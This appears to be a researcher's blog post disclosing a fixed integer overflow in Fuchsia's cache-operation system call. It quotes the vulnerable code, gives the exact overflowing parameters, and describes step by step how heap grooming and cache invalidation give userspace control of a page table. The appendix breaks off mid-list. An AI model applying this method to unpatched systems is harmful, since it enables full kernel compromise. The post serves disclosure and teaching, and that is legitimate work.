ElBlo

Local Privilege Escalation on Fuchsia

A few years ago, my then-coworker Kostya found an integer overflow bug in a system call handler in Fuchsia, and we were able to exploit it to achieve full system compromise on arm64. This post describes the bug and how to exploit it.

Summary

Due to an integer overflow in VmObject::CacheOp, it was possible to issue cache operations, including cache invalidation, on physical memory adjacent to the pages of a virtual memory object. This could be exploited to get control of page tables from userspace on ARM devices. You can find the fix here.

Virtual Memory in Zircon

The Zircon kernel keeps a big map of all the available physical memory in the physmap. This is a region of the kernel address space that maps the entire available physical address range. Linux similarly maps all physical memory directly into the kernel address space.

The kernel receives information about memory regions from the bootloader and uses it to populate the physmap. See the code for ARM and x86-64.

Memory from the physmap is managed by the Physical Memory Manager (PMM). The PMM has functions to obtain pages from the physmap, and even request contiguous physical ranges.

The Kernel Heap

The kernel has its own heap that it uses to maintain its own data structures. Its malloc and free wrappers end up calling into the PMM[1].

When the kernel notices that the heap is running out of memory, it grows it by requesting a block of contiguous memory of at least 64 pages.

Virtual Memory Objects



All memory in Fuchsia userspace is managed through Virtual Memory Objects (VMOs).

You can create a VMO with the zx_vmo_create system call, and write to it with the zx_vmo_write system call. VMOs don't start with any memory committed (i.e., they don't have any physical pages assigned to them). You can force memory to be committed to the VMO by writing to it.

One useful way to interact with a VMO is to map it into a process address space. In Fuchsia, the address space is managed through Virtual Memory Address Regions (VMARs).

Once the VMO is mapped into a VMAR, you can interact with it like a regular mapping obtained via mmap on other systems.

To summarize: all userspace allocations in Fuchsia are VMOs mapped into VMARs.

VMO Operations

The zx_vmo_op_range system call allows you to perform an operation on a range of the VMO. For example, you can commit a range of pages from the VMO using the operation ZX_VMO_OP_COMMIT. These pages are assigned directly from the top of the PMM freelist (i.e., the most recent physical pages that were returned to the PMM), and can be non-contiguous.

There are also operations that modify the cache. In other OSes, some of these operations are restricted to supervisor mode (EL1, ring 0), but in Fuchsia they are exposed in a system call[2]. These operations are ZX_VMO_OP_CACHE_CLEAN, ZX_VMO_OP_CACHE_INVALIDATE and ZX_VMO_OP_CACHE_CLEAN_INVALIDATE. The clean operation writes back whatever is in the cache to main memory. The invalidate operation invalidates the cache without writing back to memory (this can cause writes to be discarded before they reach physical memory). The clean-invalidate operation writes back to memory and then invalidates the cache.
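To make the difference between the three operations concrete, here is a minimal toy model of a write-back cache. It is a sketch under simplifying assumptions (it tracks individual bytes instead of cache lines, never evicts on its own, and models a single core), and ToyCache and its methods are hypothetical names, not Zircon APIs. The key point is that Invalidate drops pending writes instead of writing them back.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <unordered_map>
#include <vector>

// Toy write-back cache in front of main memory (hypothetical, simplified:
// tracks individual bytes instead of cache lines, never evicts on its own).
class ToyCache {
 public:
  explicit ToyCache(std::size_t mem_size) : memory_(mem_size, 0) {}

  // A write lands in the cache as dirty data; main memory is not updated yet.
  void Write(std::size_t addr, uint8_t value) {
    assert(addr < memory_.size());
    dirty_[addr] = value;
  }

  // A read sees dirty cached data if present, otherwise main memory.
  uint8_t Read(std::size_t addr) const {
    auto it = dirty_.find(addr);
    return it != dirty_.end() ? it->second : memory_.at(addr);
  }

  // Clean: write dirty data back to main memory. In this model a clean cached
  // copy is indistinguishable from memory, so it is simply dropped.
  void Clean(std::size_t addr, std::size_t len) {
    for (std::size_t a = addr; a < addr + len; ++a) {
      auto it = dirty_.find(a);
      if (it != dirty_.end()) {
        memory_.at(a) = it->second;
        dirty_.erase(it);
      }
    }
  }

  // Invalidate: drop cached data WITHOUT writing it back. Pending writes are lost.
  void Invalidate(std::size_t addr, std::size_t len) {
    for (std::size_t a = addr; a < addr + len; ++a) dirty_.erase(a);
  }

  // Clean+invalidate: write back first, then drop the cached copy.
  void CleanInvalidate(std::size_t addr, std::size_t len) {
    Clean(addr, len);
    Invalidate(addr, len);
  }

  uint8_t MemoryAt(std::size_t addr) const { return memory_.at(addr); }

 private:
  std::vector<uint8_t> memory_;
  std::unordered_map<std::size_t, uint8_t> dirty_;
};
```

For example, a Write followed by an Invalidate of the same range leaves main memory, and therefore every later Read, with the old value. That is exactly the property the exploit relies on.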

The Bug

The VMO Cache Operations allow you to specify a start offset and a length, and the kernel will run them over that range in your VMO.

Basically, it starts at the given offset, looks up the physical page backing that offset, and performs the cache operation through the physmap, from that offset until either the end of the page or the end of the range, whichever comes first. Then it advances the offset to the next page, until it reaches the end of the range.

Here is the relevant code, trimmed down to the cache invalidation case:

```cpp
const size_t end_offset = static_cast<size_t>(start_offset + len);
size_t op_start_offset = static_cast<size_t>(start_offset);

while (op_start_offset != end_offset) {
  // Offset at the end of the current page.
  const size_t page_end_offset = ROUNDUP(op_start_offset + 1, PAGE_SIZE);

  // This cache op will either terminate at the end of the current page or
  // at the end of the whole op range -- whichever comes first.
  const size_t op_end_offset = ktl::min(page_end_offset, end_offset);

  const size_t cache_op_len = op_end_offset - op_start_offset;

  const size_t page_offset = op_start_offset % PAGE_SIZE;

  // lookup the physical address of the page, careful not to fault in a new one
  paddr_t pa;
  auto status = GetPageLocked(op_start_offset, 0, nullptr, nullptr, nullptr, &pa);
  if (likely(status == ZX_OK)) {
    if (unlikely(!is_physmap_phys_addr(pa))) {
      return ZX_ERR_NOT_SUPPORTED;
    }

    // Convert the page address to a Kernel virtual address.
    const void* ptr = paddr_to_physmap(pa);
    const vaddr_t cache_op_addr = reinterpret_cast<vaddr_t>(ptr) + page_offset;

    // Perform the necessary cache op against this page.
    switch (type) {
      case CacheOpType::Invalidate:
        arch_invalidate_cache_range(cache_op_addr, cache_op_len);
        break;
      // handle other types
    }
  } else if (status == ZX_ERR_OUT_OF_RANGE) {
    return status;
  }

  op_start_offset += cache_op_len;
}
```

After all the calculations, the code calls arch_invalidate_cache_range with cache_op_addr, which is the address inside the physmap page where we are operating, and with cache_op_len as the number of bytes.

The bug is caused by the calculation of the end offset:

```cpp
const size_t end_offset = static_cast<size_t>(start_offset + len);
```

The addition will overflow, and end_offset will wrap around, if we pass a combination of start_offset and len whose sum exceeds SIZE_MAX.
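A minimal sketch of the wraparound, assuming 64-bit offsets as on arm64 and x86-64. EndOffset mirrors the vulnerable line; RangeOverflows is a hypothetical helper showing one way to reject such ranges up front, and it is not necessarily how the actual fix is written.

```cpp
#include <cassert>
#include <cstdint>
#include <limits>

// Mirrors the vulnerable computation: unsigned addition wraps modulo 2^64.
constexpr uint64_t EndOffset(uint64_t start_offset, uint64_t len) {
  return start_offset + len;
}

// Hypothetical overflow check: true if start_offset + len does not fit in
// 64 bits. One possible way to reject such ranges, not the actual fix.
constexpr bool RangeOverflows(uint64_t start_offset, uint64_t len) {
  return len > std::numeric_limits<uint64_t>::max() - start_offset;
}

static_assert(EndOffset(100, UINT64_MAX) == 99, "the end wraps around to 99");
static_assert(RangeOverflows(100, UINT64_MAX), "the overflow is detected");
static_assert(!RangeOverflows(0, UINT64_MAX), "largest range that does not wrap");
```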

Attempt 1: Simple overflow

Let's see what would happen if we pick start_offset = 100 and len = UINT64_MAX.

In that case, end_offset would be 99 and op_start_offset would be 100.

Entering the while loop, we have:

```cpp
// Offset at the end of the current page.
const size_t page_end_offset = ROUNDUP(op_start_offset + 1, PAGE_SIZE);

// This cache op will either terminate at the end of the current page or
// at the end of the whole op range -- whichever comes first.
const size_t op_end_offset = ktl::min(page_end_offset, end_offset);

const size_t cache_op_len = op_end_offset - op_start_offset;
```

page_end_offset would be PAGE_SIZE. op_end_offset will be the minimum between the end of the page (PAGE_SIZE) and end_offset (99), so it will be 99.

Finally, cache_op_len will be op_end_offset (99) minus op_start_offset (100). This will result in an integer underflow, and cache_op_len will be UINT64_MAX.

Sadly, this doesn't directly result in running the cache operation on a range outside of our VMO. After some transformations, the code bails out if the end address is not after the start address, and that is the case here: cache_op_addr + UINT64_MAX wraps around to cache_op_addr - 1.
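The arithmetic of Attempt 1 can be replayed outside the kernel. The sketch below assumes PAGE_SIZE is 4096 and models ROUNDUP for power-of-two alignments; Simulate and the physmap address kCacheOpAddr are hypothetical, chosen only to show that the computed end address wraps around to just before the start.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>

// Assumption: 4KiB pages.
constexpr uint64_t kPageSize = 4096;

// Power-of-two ROUNDUP, matching the kernel macro's behavior.
constexpr uint64_t RoundUp(uint64_t x, uint64_t align) {
  return (x + align - 1) & ~(align - 1);
}

struct FirstIteration {
  uint64_t end_offset;
  uint64_t op_end_offset;
  uint64_t cache_op_len;
};

// Hypothetical helper: replays the first loop iteration of the excerpt.
constexpr FirstIteration Simulate(uint64_t start_offset, uint64_t len) {
  const uint64_t end_offset = start_offset + len;  // may wrap around
  const uint64_t page_end_offset = RoundUp(start_offset + 1, kPageSize);
  const uint64_t op_end_offset = std::min(page_end_offset, end_offset);
  return {end_offset, op_end_offset, op_end_offset - start_offset};
}

constexpr FirstIteration kAttempt1 = Simulate(100, UINT64_MAX);
static_assert(kAttempt1.end_offset == 99, "end_offset wraps to 99");
static_assert(kAttempt1.op_end_offset == 99, "min(PAGE_SIZE, 99)");
static_assert(kAttempt1.cache_op_len == UINT64_MAX, "99 - 100 underflows");

// Hypothetical physmap address of the byte at offset 100 (0x64) of our page.
constexpr uint64_t kCacheOpAddr = 0xffff000012345064ull;
static_assert(kCacheOpAddr + kAttempt1.cache_op_len == kCacheOpAddr - 1,
              "the end address lands just before the start address");
```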



Attempt 2: Minimizing the number of affected pages

So using this combination of start_offset and len doesn't work. We need another pair of values: one that gives us a cache_op_len that is greater than PAGE_SIZE but that doesn't overflow when added to the start address.

If we increase start_offset, we decrease cache_op_len (it is computed as a small, wrapped end_offset minus start_offset), so let's use a huge start_offset!

We cannot use just any value for start_offset, as that offset needs to be part of our VMO. The maximum VMO size that we can have is 32 pages less than 2^64. Given that a VMO doesn't start with its memory committed, we can have a VMO of that size without problems.

So let's set start_offset = UINT64_MAX - 32*PAGE_SIZE (the last byte of such a VMO) and len = 32*PAGE_SIZE + 1 so we get an overflow.

This would end up with the following values:

```cpp
size_t start_offset = 0xfffffffffffdffffull;  // UINT64_MAX - 32*PAGE_SIZE
size_t len = 0x20001;                         // 32*PAGE_SIZE + 1
const size_t end_offset = 0;                  // start_offset + len wraps around
const size_t page_end_offset = 0xfffffffffffe0000ull;
const size_t op_end_offset = 0;               // min(page_end_offset, end_offset)
const size_t cache_op_len = 0x20001;          // 0 - op_start_offset
```

This makes cache_op_len a value that will not overflow when we add it to the start address. As a result, the kernel performs the cache operation starting at an address in the physmap that corresponds to our VMO, but continuing for 0x20001 bytes. Since start_offset is the last byte of its page, the operation covers that byte plus the 32 physical pages that follow it. Given that the memory committed to our VMO is not necessarily contiguous (and here only a single page is committed), we are operating on a range of physical memory that is outside of our VMO.

If we increase len, we end up operating on even more pages, but it will become clear later that we want to operate on as few pages as possible.
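The same replay for Attempt 2, extended to report which physical bytes the single loop iteration touches. The physical address kPagePa of the committed page is a made-up value and AffectedRange is a hypothetical helper; the sketch assumes 4KiB pages.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>

// Assumption: 4KiB pages, as in the values listed above.
constexpr uint64_t kPageSize = 4096;

// Power-of-two ROUNDUP, matching the kernel macro's behavior.
constexpr uint64_t RoundUp(uint64_t x, uint64_t align) {
  return (x + align - 1) & ~(align - 1);
}

// Half-open range [begin, end) of physical addresses.
struct PhysRange {
  uint64_t begin;
  uint64_t end;
};

// Hypothetical helper: replays the first loop iteration and returns the
// physical range handed to the cache op, given the physical address of the
// page committed at start_offset.
constexpr PhysRange AffectedRange(uint64_t page_pa, uint64_t start_offset,
                                  uint64_t len) {
  const uint64_t end_offset = start_offset + len;  // wraps to a small value
  const uint64_t page_end_offset = RoundUp(start_offset + 1, kPageSize);
  const uint64_t op_end_offset = std::min(page_end_offset, end_offset);
  const uint64_t cache_op_len = op_end_offset - start_offset;
  const uint64_t begin = page_pa + start_offset % kPageSize;
  return {begin, begin + cache_op_len};
}

constexpr uint64_t kStart = UINT64_MAX - 32 * kPageSize;  // 0xfffffffffffdffff
constexpr uint64_t kLen = 32 * kPageSize + 1;             // 0x20001
constexpr uint64_t kPagePa = 0x80000000;  // hypothetical physical address of our page

constexpr PhysRange kRange = AffectedRange(kPagePa, kStart, kLen);

// The op starts at the last byte of our page...
static_assert(kRange.begin == kPagePa + kPageSize - 1, "starts at our last byte");
// ...and ends exactly 32 pages past our page: those pages are not ours.
static_assert(kRange.end == kPagePa + 33 * kPageSize, "covers the next 32 pages");
// op_start_offset + cache_op_len lands on end_offset (0), so the loop runs once.
static_assert(kStart + kLen == 0, "single iteration");
```

Growing len by PAGE_SIZE moves kRange.end one more page forward, which is why we keep len at the minimum.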

Note that in order for the cache operation to be issued, the page at start_offset has to be committed. This can be done via either zx_vmo_write or zx_vmo_op_range with the ZX_VMO_OP_COMMIT operation.

The Exploit

With the bug, we can issue cache operations on memory that is physically contiguous to our VMO page. The interesting cache operation is ZX_VMO_OP_CACHE_INVALIDATE, which invalidates the cache and discards data that has not been written back to memory yet. Basically, we can discard writes to memory that doesn't belong to us.

So the steps to exploit this bug would be:

- Create a VMO with maximum size.
- Commit the last page of that VMO.
- Call zx_vmo_op_range with ZX_VMO_OP_CACHE_INVALIDATE and the offsets described in the bug section.
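The zx_vmo_create and zx_vmo_op_range calls themselves cannot run outside Fuchsia, but the arguments they would receive can be derived and checked at compile time. This is a sketch assuming 4KiB pages and the maximum VMO size stated above; the constant names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// Assumption: 4KiB pages.
constexpr uint64_t kPageSize = 4096;

// Maximum VMO size as stated above: 2^64 minus 32 pages. 2^64 itself does not
// fit in 64 bits, so compute it as 0 - 32 pages, which wraps modulo 2^64.
constexpr uint64_t kMaxVmoSize = uint64_t{0} - 32 * kPageSize;

// Offset of the last page of the VMO, the page we commit.
constexpr uint64_t kLastPageOffset = kMaxVmoSize - kPageSize;

// Offset and length for the ZX_VMO_OP_CACHE_INVALIDATE call.
constexpr uint64_t kOpOffset = kMaxVmoSize - 1;  // last byte of the VMO
constexpr uint64_t kOpLen = 32 * kPageSize + 1;  // makes end_offset wrap to 0

static_assert(kOpOffset == 0xfffffffffffdffffull, "same start_offset as above");
static_assert(kOpOffset >= kLastPageOffset && kOpOffset < kMaxVmoSize,
              "the op starts inside the committed last page");
static_assert(kOpOffset + kOpLen == 0, "end_offset wraps around to 0");
```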

If we call zx_vmo_op_range with ZX_VMO_OP_CACHE_INVALIDATE in a loop, the kernel will quickly panic: we are invalidating writes in random locations, which causes asserts to fail and all kinds of memory corruption.

At this point, we have no control over what we are invalidating… Or do we?

Control what memory gets invalidated via Kernel Heap Feng-Shui

The bug lets us issue operations on the physical memory that is contiguous to our VMO page. We commit a memory page, issue a cache operation, and whatever is next to it will also be affected. However, it's not easy to control which physical page we will get: we get whatever is on top of the PMM freelist.

We can take advantage of how the PMM works by freeing a huge contiguous allocation before committing our VMO page. How can we do this? Using the kernel heap.

We can make a lot of kernel heap allocations, which will make the kernel heap grow by requesting contiguous physical memory from the PMM. Then we can free all the allocations at once, causing the kernel to return that memory to the PMM. This puts contiguous physical pages on top of the PMM freelist. This technique is called Heap Feng-Shui.
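A toy model of why this works, assuming the PMM freelist behaves like a LIFO stack of page numbers (most recently freed page handed out first). ToyPmm is hypothetical and much simpler than Zircon's PMM, and the order in which FreeRun pushes pages is an assumption chosen so that later allocations come out in ascending physical order.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical toy PMM: the freelist is a LIFO stack of physical page numbers.
class ToyPmm {
 public:
  // Returns a single page to the top of the freelist.
  void Free(uint64_t page) { free_.push_back(page); }

  // Hands out the page on top of the freelist (the most recently freed one).
  uint64_t Alloc() {
    assert(!free_.empty());
    const uint64_t page = free_.back();
    free_.pop_back();
    return page;
  }

  // Models the heap shrinking: returns the contiguous run [first, first + count).
  // Pushing in reverse order makes later Alloc() calls return the run in
  // ascending order; this ordering is an assumption of the model.
  void FreeRun(uint64_t first, uint64_t count) {
    for (uint64_t i = count; i > 0; --i) Free(first + i - 1);
  }

 private:
  std::vector<uint64_t> free_;
};
```

For example, after Free(7), Free(42), Free(3) and then FreeRun(1000, 64), the next 33 Alloc() calls return pages 1000 through 1032 in order, so the page committed to the exploit VMO is immediately followed in physical memory by the pages handed out next. Without the FreeRun call, the first allocations would return 3, 42 and 7, none of which are adjacent.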

To make kernel heap allocations, we can use sockets.

The system calls that we can use to interact with sockets are zx_socket_create and zx_socket_write. Note that, unlike with VMOs, the memory used for sockets comes from the kernel heap. This means that writing data to sockets causes the heap to grow, and freeing them causes the heap to shrink.

Invalidating a Local VMO

An easy way to check whether our theory about contiguous memory holds is to invalidate writes to another VMO that we own. Basically, the steps are:

- Create exploitVMO with maximum size.
- Create targetVMO with >32 pages of size.
- Make lots of kernel allocations using sockets and fill them with data.
- Free all the sockets.
  - This will cause contiguous memory to be put on top of the PMM freelist.
- Commit the last page of exploitVMO.
- Commit all pages of targetVMO.
  - If the heap feng-shui succeeded, targetVMO will have pages contiguous to the one allocated to exploitVMO.
- Spawn N threads issuing cache invalidate operations over exploitVMO.
- In a loop, write random data to targetVMO and read it back.

If the invalidation succeeded, we should eventually observe that one of the writes to targetVMO was discarded. Furthermore, the system should stay stable, because we are not invalidating writes in random regions of memory.



Controlling Page Tables

We now have a reliable way of getting contiguous memory on top of the PMM freelist. We were able to allocate it to a VMO and invalidate some of the writes to that VMO. In order to get total control of the kernel, we need to find some kernel memory that we can corrupt to our advantage.

This vulnerability is a free ticket to use-after-free style corruptions: for example, we can invalidate writes that zero memory or clear pointers, leaving dangling pointers everywhere.

One set of data structures that would give us full, instant access to everything is the page tables (there's an appendix with a refresher on these data structures). What if we get control over a page table from userspace? We could map whatever we want, replace kernel code, data, etc. But… how can we do that?

The memory mapping structures use regular 4KiB pages, which also come from the PMM. So if we can get some page tables allocated right after we commit our exploit VMO page, we might be able to invalidate the writes that are done to them.

If we can get a Page Directory allocated in memory contiguous to our exploit VMO page, we can invalidate some of the writes that the OS performs when it modifies mapping structures. For example, if the Page Directory references a Page Table and that mapping gets removed, the OS will mark the corresponding Page Directory entry as not present, and the page used for the Page Table will be freed to the PMM. We can then get that page mapped into userspace by committing it to a VMO. So what if we invalidate the write that marks the Page Directory Entry as no longer present? The processor would still consider the entry present, but the page it points to would be under our control.
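The idea can be illustrated with a toy Page Directory whose writes go through a write-back cache. This is a simplification: entries here are just next-level page numbers (0 meaning not present), caching is tracked per entry rather than per cache line, and ToyPageDirectory is a hypothetical type. In this model, Read stands for what any later reader observes once the dirty data is gone.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical toy Page Directory behind a write-back cache.
// Entry value 0 = not present; otherwise the next-level Page Table's page number.
struct ToyPageDirectory {
  std::array<uint64_t, 512> memory{};  // contents of main memory
  std::array<uint64_t, 512> cached{};  // dirty values still sitting in the cache
  std::array<bool, 512> dirty{};       // whether cached[i] has not been written back

  // The kernel updates an entry: the new value only reaches the cache.
  void Write(std::size_t i, uint64_t value) {
    cached.at(i) = value;
    dirty.at(i) = true;
  }

  // What a later reader sees: the dirty cached value if any, else memory.
  uint64_t Read(std::size_t i) const { return dirty.at(i) ? cached.at(i) : memory.at(i); }

  // Cache clean: dirty entries are written back to main memory.
  void CleanAll() {
    for (std::size_t i = 0; i < memory.size(); ++i) {
      if (dirty[i]) {
        memory[i] = cached[i];
        dirty[i] = false;
      }
    }
  }

  // Cache invalidate: dirty entries are dropped without being written back.
  void InvalidateAll() { dirty.fill(false); }
};
```

For example, Write(1, pt2) followed by CleanAll() puts the entry in memory; a later Write(1, 0) for the unmap followed by InvalidateAll() leaves Read(1) returning pt2, a stale pointer to a page that has already been freed.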

So the new steps would be:

- Create exploitVMO with maximum size.
- Create targetVMO with >32 pages of size.
- Create mapVMAR of at least 1GiB, aligned to 1GiB.
  - This is so it covers an entire Page Directory.
  - The kernel will not create page tables until we map something into this VMAR.
- Create mapVMO of 1 page. Commit it.
- Create ptVMO with ~32 pages of size.
  - We will use this later to take control of the Page Table.
- Make lots of kernel allocations using sockets and fill them with data.
- Free all the sockets.
  - This will cause contiguous memory to be put on top of the PMM freelist.
- Commit the last page of exploitVMO.
- Map mapVMO into offset 0 of mapVMAR.
  - This will cause the kernel to create a Page Directory and a Page Table, using at least 2 pages from the PMM (and more for internal bookkeeping).

At this point, memory looks somewhat like this:



- Commit all pages of targetVMO.
  - If the heap feng-shui succeeded, targetVMO will have pages contiguous to the one allocated to exploitVMO.
- Map mapVMO into offset 2MiB of mapVMAR.
  - This will cause a new Page Table to be created and assigned into the Page Directory that was previously created.
  - Note that the page used for this new Page Table will be outside of the affected range.
- Sleep for a few seconds, or call the cache clean operation over exploitVMO.
  - We want to make sure that the new Page Directory Entry has been written back to main memory.
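A small sketch, assuming 4KiB pages and 4-level translation, of why offsets 0 and 2MiB of a 1GiB-aligned mapVMAR land in entries 0 and 1 of the same Page Directory. The base address kMapVmarBase is hypothetical; any 1GiB-aligned value gives the same indices.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kGiB = 1ull << 30;
constexpr uint64_t kMiB = 1ull << 20;

// Index into the Page Directory: bits [21, 30) of the virtual address.
constexpr uint64_t PdIndex(uint64_t va) { return (va >> 21) & 0x1ff; }
// Index into the Page Table: bits [12, 21) of the virtual address.
constexpr uint64_t PtIndex(uint64_t va) { return (va >> 12) & 0x1ff; }
// Bits from 30 upwards select which Page Directory is used.
constexpr uint64_t PdSelector(uint64_t va) { return va >> 30; }

// Hypothetical 1GiB-aligned base address of mapVMAR.
constexpr uint64_t kMapVmarBase = 5 * kGiB;

static_assert(PdSelector(kMapVmarBase) == PdSelector(kMapVmarBase + 2 * kMiB),
              "both mappings share one Page Directory");
static_assert(PdIndex(kMapVmarBase) == 0, "offset 0 -> PD entry 0 (Page Table 1)");
static_assert(PdIndex(kMapVmarBase + 2 * kMiB) == 1, "offset 2MiB -> PD entry 1 (Page Table 2)");
static_assert(PtIndex(kMapVmarBase + 2 * kMiB) == 0, "first entry of Page Table 2");
```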

The setup is now complete, and we are ready to exploit the bug. This is how the memory should look:

The last few steps are:

- Spawn N threads issuing cache invalidate operations over exploitVMO.
- Unmap offset 2MiB from mapVMAR.
  - This will cause the kernel to write zero to the second Page Directory Entry and free Page Table 2, which will be returned to the PMM.
  - Note that the Page Directory will not be removed, as it still has a mapped entry (Page Table 1).
- Stop the invalidate operations.
- Commit all pages of ptVMO.
  - One of the committed pages will be the page used for Page Table 2 that was just freed.
  - If the exploit succeeded, the second Page Directory Entry will still point to it.
- Zero out all pages of ptVMO.
- Map mapVMO into offset 2MiB of mapVMAR.
- Search all the pages of ptVMO for a non-zero page.
  - If there is a non-zero page in ptVMO, that page is the one that contains Page Table 2.
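The final search step amounts to finding the first page with a non-zero word. In this sketch, the pages of ptVMO are modeled as plain arrays of 512 64-bit words (in the real exploit they would be read through a mapping of ptVMO); Page and FindNonZeroPage are hypothetical names.

```cpp
#include <algorithm>
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// One 4KiB page viewed as 512 64-bit words (hypothetical model of a ptVMO page).
using Page = std::array<uint64_t, 512>;

// Returns the index of the first page containing a non-zero word, or -1 if all
// pages are zero. In the exploit, that page would be the hijacked Page Table 2.
int FindNonZeroPage(const std::vector<Page>& pages) {
  for (std::size_t i = 0; i < pages.size(); ++i) {
    const bool non_zero = std::any_of(pages[i].begin(), pages[i].end(),
                                      [](uint64_t word) { return word != 0; });
    if (non_zero) return static_cast<int>(i);
  }
  return -1;
}
```

Since mapVMO is mapped at the very start of the 2MiB region, the kernel's write should land in word 0 of the hijacked page.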

It might take multiple tries to get it to work, but the exploit is pretty reliable. After it is done, you will be in control of a page table: you can map any physical page with user-level permissions and modify it. This includes kernel code and data.
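To map an arbitrary physical page, one would write a descriptor into the hijacked Page Table. Below is a sketch of building an arm64 level-3 page descriptor (4KiB granule) that is readable and writable from EL0 and non-executable. The field positions follow the Arm VMSAv8-64 descriptor format; the memory attribute index kAttrIndxNormal is an assumption, since it depends on how the kernel programmed MAIR_EL1, and MakeUserRwPte is a hypothetical helper. Stale TLB entries for the target virtual address may also need to be gone before such a mapping takes effect.

```cpp
#include <cassert>
#include <cstdint>

// arm64 (VMSAv8-64, 4KiB granule) level-3 page descriptor fields.
constexpr uint64_t kDescPage = 0b11;             // bits [1:0]: valid page descriptor
constexpr uint64_t kAttrIndxNormal = 0;          // ASSUMED MAIR_EL1 index for normal memory
constexpr uint64_t kApEl0ReadWrite = 1ull << 6;  // AP[2:1] = 0b01: RW at EL1 and EL0
constexpr uint64_t kShInner = 3ull << 8;         // SH[1:0] = 0b11: inner shareable
constexpr uint64_t kAccessFlag = 1ull << 10;     // AF set, so no access-flag fault
constexpr uint64_t kPxn = 1ull << 53;            // privileged execute-never
constexpr uint64_t kUxn = 1ull << 54;            // unprivileged execute-never
constexpr uint64_t kOutputAddrMask = 0x0000fffffffff000ull;  // bits [47:12]

// Hypothetical helper: descriptor mapping physical page `pa` RW for userspace.
constexpr uint64_t MakeUserRwPte(uint64_t pa) {
  return (pa & kOutputAddrMask) | kDescPage | (kAttrIndxNormal << 2) |
         kApEl0ReadWrite | kShInner | kAccessFlag | kPxn | kUxn;
}
```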

That’s all! With a simple integer overflow (and a very powerful operation being exposed to userspace), we were able to take control over the system :). I hope you enjoyed this post.

Appendix: MMU Refresher

This section talks a little bit about how paging works on arm64 and x86-64, with 4-level page tables and 4KiB pages. I will refer to the structures using the Intel nomenclature (Page Frame, Page Table, Page Directory, Page Directory Pointer Table and Page Map Level 4). This refresher is important because the exploit takes control over page tables. You can skip it if you already know this stuff.

Processors have a feature called virtual memory, which allows the OS to present applications with a facade-like view of memory. Applications use virtual memory addresses, which then get translated by the processor's Memory Management Unit (MMU) into physical memory addresses. The MMU uses data structures called Page Tables that are set up by the operating system.

The processor divides memory into 4KiB page frames. Page 0 goes from 0x0000 to 0x0FFF, page 1 goes from 0x1000 to 0x1FFF, and so on. When you use a virtual address, the processor looks up the corresponding page frame in the Page Tables[3], and then accesses the corresponding offset within that page frame.

In a system that uses 4-level paging, the processor splits the virtual address into multiple chunks. The 12 least significant bits are the page offset, a number from 0x000 to 0xFFF that is used to access the page, in case it is mapped. The next bits are divided into groups of 9 bits. The first group is an index into a Page Table, the second group is an index into a Page Directory, the third group is an index into a Page Directory Pointer Table, and the fourth group is an index into a Page Map Level 4 table. The remaining upper bits are not used for the table lookup.

So, to recap:

- Bits [0 .. 12) are the Page Offset.
- Bits [12 .. 21) are an index into a Page Table.
- Bits [21 .. 30) are an index into a Page Directory.
- Bits [30 .. 39) are an index into a Page Directory Pointer Table.
- Bits [39 .. 48) are an index into a Page Map Level 4.
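The recap above translates directly into shifts and masks. A minimal sketch, with SplitVa and VaParts as hypothetical names:

```cpp
#include <cassert>
#include <cstdint>

// The four 9-bit table indices and the 12-bit page offset of a virtual address.
struct VaParts {
  uint64_t pml4, pdpt, pd, pt, offset;
};

// Splits a virtual address for 4-level paging with 4KiB pages.
constexpr VaParts SplitVa(uint64_t va) {
  return {
      (va >> 39) & 0x1ff,  // bits [39, 48): Page Map Level 4 index
      (va >> 30) & 0x1ff,  // bits [30, 39): Page Directory Pointer Table index
      (va >> 21) & 0x1ff,  // bits [21, 30): Page Directory index
      (va >> 12) & 0x1ff,  // bits [12, 21): Page Table index
      va & 0xfff,          // bits [0, 12): offset within the page frame
  };
}
```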

Page Table, Page Directory, Page Directory Pointer Table, and Page Map Level 4 are commonly referred to as Page Tables. Each table uses an entire page frame (4KiB of memory, aligned to 4KiB) and has 512 64-bit entries, so with 9 bits we can index the entire table (2^9 is 512). Each of these entries has attributes that apply to all the virtual addresses covered by that entry. One of the relevant fields is whether the entry is present or not. If it is, another field tells us where the next-level page table is.

There's a control register called cr3 which contains the physical address of the Page Map Level 4 (on arm64, the equivalent registers are TTBR0_EL1 and TTBR1_EL1). When the processor needs to find the physical address associated with a virtual address, it starts by looking into the Page Map Level 4, using bits [39 .. 48) as an index into that table. If the indexed entry is present, it takes the address of the Page Directory Pointer Table from it.

Using bits [30 .. 39), the processor looks up the corresponding entry in the Page Directory Pointer Table; if it is present, it takes the address of the Page Directory from it and continues the search. It does the same using bits [21 .. 30) to find the address of the Page Table, if present, and from there it locates the page frame by indexing the table with bits [12 .. 21).
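The walk described above can be sketched as a loop over the four levels. This is a simplified model: entries only carry a present bit (bit 0) and an address in bits [12 .. 48), while real x86-64 and arm64 entries have many more attribute bits, and physical memory is a hypothetical map from a table's physical address to its contents.

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <unordered_map>

using Table = std::array<uint64_t, 512>;

// Simplified entry format for this sketch.
constexpr uint64_t kPresent = 1;                          // bit 0: entry is present
constexpr uint64_t kAddrMask = 0x0000fffffffff000ull;     // bits [12, 48): next address

// Hypothetical physical memory holding only page-table pages.
using PhysMem = std::unordered_map<uint64_t, Table>;

// Walks PML4 -> PDPT -> PD -> PT starting at `root` (the cr3 value).
// Stores the physical address in *pa and returns true on success; returns
// false if an entry is not present (where real hardware would fault).
bool Translate(const PhysMem& mem, uint64_t root, uint64_t va, uint64_t* pa) {
  uint64_t table = root;
  for (int shift = 39; shift >= 12; shift -= 9) {
    const uint64_t index = (va >> shift) & 0x1ff;
    const auto it = mem.find(table);
    if (it == mem.end()) return false;
    const uint64_t entry = it->second[index];
    if ((entry & kPresent) == 0) return false;
    table = entry & kAddrMask;  // next table, or the page frame after the last level
  }
  *pa = table | (va & 0xfff);
  return true;
}
```

For example, with PML4[1] pointing to a PDPT, PDPT[2] to a PD, PD[3] to a PT and PT[4] to the frame at 0x9000, the address (1 << 39) | (2 << 30) | (3 << 21) | (4 << 12) | 0x123 translates to 0x9123.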

Let's see how much memory we can reference at each level:

- A Page Table can reference 512 page frames, totalling 2MiB of virtual addresses.

